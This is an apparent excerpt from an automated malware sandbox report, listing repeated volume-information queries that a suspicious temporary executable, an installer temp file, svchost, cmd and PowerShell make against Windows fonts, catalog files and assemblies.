Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
